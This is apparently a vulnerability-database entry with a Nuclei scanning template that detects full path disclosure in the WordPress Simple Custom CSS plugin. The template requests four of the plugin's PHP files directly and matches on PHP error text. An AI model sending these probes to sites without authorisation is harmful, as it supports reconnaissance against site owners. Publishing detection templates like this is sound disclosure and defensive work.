漏洞描述
Detected WordPress Simple Custom CSS plugin internal file system path was exposed through direct file access.
wp-simple-custom-css-fpd: WordPress Simple Custom CSS Plugin - Full Path Disclosure
PoC代码[已公开]
id: wp-simple-custom-css-fpd
info:
name: WordPress Simple Custom CSS Plugin - Full Path Disclosure
author: 0x_Akoko
severity: low
description: |
Detected WordPress Simple Custom CSS plugin internal file system path was exposed through direct file access.
reference:
- https://wordpress.org/plugins/simple-custom-css/
metadata:
max-request: 4
verified: false
publicwww-query: "/plugins/simple-custom-css/"
tags: debug,wordpress,fpd,vuln,simple-custom-css,wp-plugin
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simple-custom-css/simple-custom-css.php"
- "{{BaseURL}}/wp-content/plugins/simple-custom-css/includes/admin.php"
- "{{BaseURL}}/wp-content/plugins/simple-custom-css/includes/public.php"
- "{{BaseURL}}/wp-content/plugins/simple-custom-css/includes/customizer.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 500'
- 'contains(body, "plugins/simple-custom-css/")'
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:","failed to open stream")'
condition: and
# digest: 4b0a00483046022100ba2c83a0b728b16117a15e110d02b187522166de01fdc0c9a7a8eb3f1b839a1002210080d268aad01c3eb200be19998b34dc8a1df7cd757325ebb9dfc06d255175f17f:922c64590222798bb761d5b6d8e72950